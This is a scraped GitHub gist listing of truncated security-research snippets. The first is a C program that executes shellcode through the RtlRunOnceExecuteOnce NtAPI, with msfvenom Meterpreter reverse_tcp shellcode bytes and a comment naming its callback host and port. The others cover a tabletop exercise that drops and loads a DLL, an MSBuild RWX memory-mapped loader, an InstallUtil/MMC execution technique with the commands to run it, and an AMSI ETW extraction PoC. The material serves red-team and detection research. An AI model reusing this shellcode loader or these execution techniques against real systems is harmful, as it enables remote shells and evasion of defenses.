@joe-desimone
joe-desimone / RtlRunOnceExecuteOnceShellcodeExec.c
Created April 6, 2023 14:02 — forked from paranoidninja/RtlRunOnceExecuteOnceShellcodeExec.c
Shellcode execution via RtlRunOnceExecuteOnce NtAPI
#include <windows.h>
#include <stdio.h>
extern WORD WINAPI RtlRunOnceExecuteOnce(RTL_RUN_ONCE *once, PRTL_RUN_ONCE_INIT_FN func, void *param, void **context);
typedef ULONG (WINAPI* RTL_RUN_ONCE_INIT_FN)(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context);
// msfvenom LPORT=8080 LHOST=172.16.219.1 -p windows/x64/meterpreter/reverse_tcp -f c
unsigned char shellcode_bin[] =
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
@joe-desimone
joe-desimone / README.md
Created October 17, 2022 14:17
Table Top With Teeth - Training Exercise

Instructions

The following script is designed to create artifacts that teams can use to hunt for new or interesting capabilities.

This table top is based on the code here: https://github.com/code-scrap/DynamicWrapperDotNet

The script is self-contained. It dynamically writes a DLL to disk and loads it into cscript.exe.

To invoke: cscript.exe stranger_things.js

This example expects a 64-bit system.

@joe-desimone
joe-desimone / gist:f2a3564e74621169540e26499c4588ad
Created September 21, 2022 22:51
MSBuild Property Functions - Load RWX Memory Mapped File
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
<Target Name="Hello" >
<!-- Call ANY .NET API -->
<!--
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@joe-desimone
joe-desimone / Snapit.cs
Created August 4, 2022 01:25
Snapit - MMC Installer, things
using Microsoft.ManagementConsole;
using System.ComponentModel;
using System;
using System.Security.Permissions;
using System.Collections;
/*
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /reference:C:\Windows\assembly\GAC_MSIL\microsoft.managementconsole\3.0.0.0__31bf3856ad364e35\microsoft.managementconsole.dll .\Snapit.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe SnapIt.dll
@joe-desimone
joe-desimone / AMSIScriptContentRetrieval.ps1
Created June 7, 2021 00:23 — forked from mattifestation/AMSIScriptContentRetrieval.ps1
PoC code used to demonstrate extracting script contents using the AMSI ETW provider
# Script author: Matt Graeber (@mattifestation)
# logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets
# Do your malicious things here that would be logged by AMSI
# logman stop AMSITrace -ets
$OSArchProperty = Get-CimInstance -ClassName Win32_OperatingSystem -Property OSArchitecture
$OSArch = $OSArchProperty.OSArchitecture
$OSPointerSize = 32
if ($OSArch -eq '64-bit') { $OSPointerSize = 64 }